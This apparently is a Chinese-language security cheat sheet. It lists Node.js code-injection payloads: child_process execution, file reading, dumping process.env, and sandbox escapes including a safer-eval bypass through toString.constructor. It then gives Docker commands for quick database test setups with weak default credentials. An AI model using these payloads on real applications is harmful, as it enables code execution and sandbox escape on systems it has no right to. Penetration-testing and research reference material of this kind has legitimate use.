nodejs 代码执行利用
贴一下之前总结的关于 nodejs 利用的知识点
require("child_process").exec("whoami")toString()
require("child_process").execSync("dir").toString()
windows
require("child_process").execFileSync("cmd",["/C","dir"]).toString()
require("child_process").spawnSync("cmd",["/C","dir"])["output"][1].toString()
无回显
require("child_process").spawn("cmd",["/C","calc"])
require("child_process").execFile("cmd",["/C","calc"]) //要运行的可执行文件的名称或路径。
列目录
require("fs").readdirSync('C:\\')
读文件
require("fs").readFileSync("123.txt").toString()
利用 process 获取敏感信息
process.env
process.cwd()
process.arch
process.version
process.geteuid()
没有require下引入模块
global.process.mainModule.constructor._load('child_process').exec('calc')
没有process
toString.constructor('return process')().mainModule.constructor._load('child_process').execSync('whoami')
绕过沙盒 safer-eval
toString.constructor('return process')().mainModule.constructor._load('child_process').execSync('whoami')
Docker-常见数据库的快速搭建
mysql8
docker run -dit --name mysql8 -e MYSQL_ROOT_PASSWORD=password haakco/mysql80
docker exec -it mysql8 bash -c "mysql -u root -p"
开启远程连接
ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password by 'password';
PostgreSQL
docker run --name postgresql -itd --restart always --publish 5432:5432 --volume postgresql:/var/lib/postgresql sameersbn/postgresql:12-20200524
docker exec -it postgresql sudo -u postgres psql
Mssql
需要较高内存
docker run --name mssql -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=password' -e 'MSSQL_PID=Express' -p 1433:1433 -d microsoft/mssql-server-linux
docker exec -it mssql /opt/mssql-tools/bin/sqlcmd -S localhost -U sa -P password
Redis
docker run --name some-redis -d redis
docker exec -it some-redis redis-cli
Sqlite3
docker run --name sqlite3 -it nouchka/sqlite3 sqlite3
Oracle
docker pull alexeiled/docker-oracle-xe-11g
docker run -h "oracle" --name "oracle" -d -p 49160:22 -p 49161:1521 -p 49162:8080 alexeiled/docker-oracle-xe-11g
docker exec -it oracle bash
进入 docker 后执行
sqlplus system/oracle
MongoDB
构建
docker run -d \
--name mongodb \
-p 27017:27017 \
-e MONGODB_USERNAME=myusername \
-e MONGODB_PASSWORD=mypassword \
frodenas/mongodb
运行
docker exec -it mongodb /bin/bash -c 'mongo 127.0.0.1/admin -u myusername -p'
MongoDB shell version: 3.0.7
Enter password:
connecting to: 127.0.0.1/admin
>mypassword